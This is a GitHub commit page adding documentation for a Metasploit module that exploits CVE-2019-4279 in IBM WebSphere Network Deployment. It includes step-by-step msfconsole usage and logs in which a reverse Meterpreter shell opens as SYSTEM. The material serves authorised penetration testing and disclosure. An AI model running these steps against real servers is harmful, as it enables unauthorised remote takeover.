Skip to content
Permalink
Browse files

Land #11841, IBM WAS Network Deployment RCE CVE-2019-4279

  • Loading branch information...
jrobles-r7 committed Jun 4, 2019
2 parents eff819b + 129bb89 commit c1572c89a802dfc36253f95f29af7bda890b2b71
@@ -0,0 +1,77 @@
## Description
This module exploits the lack of proper authentication checks in IBM Websphere Application Server ND that allows for the execution of an arbitrary command and upload of an arbitrary file as SYSTEM. The module serializes the required Java objects expected by the IBM Websphere server.

The vulnerability was identified by @rwincey (b0yd) of [Securifera](https://www.securifera.com/) and was assigned [CVE-2019-4279](https://www-01.ibm.com/support/docview.wss?uid=ibm10883628).


## Vulnerable Application
The module affects [IBM Websphere Application Server Network Deployment](https://www.ibm.com/support/knowledgecenter/en/SSAW57/mapfiles/product_welcome_wasnd.html). The agent is installed on servers with the network deployment feature and listens on TCP port 11002,11004, or 11006. The vulnerability affects versions up to 9.0.0.11.

## Verification Steps
To use this exploit you will need access to IBM Websphere Application Server Network Deployment.

1. Install the IBM Websphere Application Server Network Deployment on a host.
2. Ensure that the service is running and listening on TCP port 11002, 11004, or 11006.
3. Launch `msfconsole`.
4. Load the module `use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce`.
5. Set the remote host ip to execute `set RHOSTS 192.168.162.133`.
6. Set the command to execute `set CMD "calc.exe"`.
7. Run the exploit `exploit`.

The result should be that calc.exe is executed on the target machine.

## Usage Scenarios
The exploit module contains several targets as detailed below.

### Target 0: Windows Powershell Injected Shellcode
This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell).

```
msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce
msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > exploit
[*] Started reverse TCP handler on 172.22.222.136:4444
[*] 172.22.222.200:11006 - Connected to IBM WAS DMGR.
[*] 172.22.222.200:11006 - Server responded
[*] 172.22.222.200:11006 - Sending payload: FOAFKqEH.exe
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.200:50575) at 2019-05-30 06:10:39 -0500
[*] 172.22.222.200:11006 - Disconnected from IBM Websphere DMGR.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-IPOGIJR
OS : Windows 10 (Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > exit
```

### Target 1: CMD
This target isn't a formal target. It was added to allow a user to execute commands entirely through the IBM Websphere Application Network Deployment Server remote administration feature. It would be the most quiet of the targets as it does not create any additional connections or use powershell by default like Target 0.

```
msf5 > use exploit/windows/ibm/ibm_was_dmgr_java_deserialization_rce
msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set target 1
target => 1
msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set payload cmd/windows/generic
payload => cmd/windows/generic
msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > set cmd "ping -n 10 172.22.222.200"
cmd => ping -n 10 172.22.222.200
msf5 exploit(windows/ibm/ibm_was_dmgr_java_deserialization_rce) > run
[*] 172.22.222.200:11006 - Connected to IBM WAS DMGR.
[*] 172.22.222.200:11006 - Server responded
[*] 172.22.222.200:11006 - Executing command: ping -n 10 172.22.222.200
[*] 172.22.222.200:11006 - Sending payload: uMuOTPtG.bat
[*] 172.22.222.200:11006 - Disconnected from IBM Websphere DMGR.
[*] Exploit completed, but no session was created.
```

0 comments on commit c1572c8

Please sign in to comment.
You can’t perform that action at this time.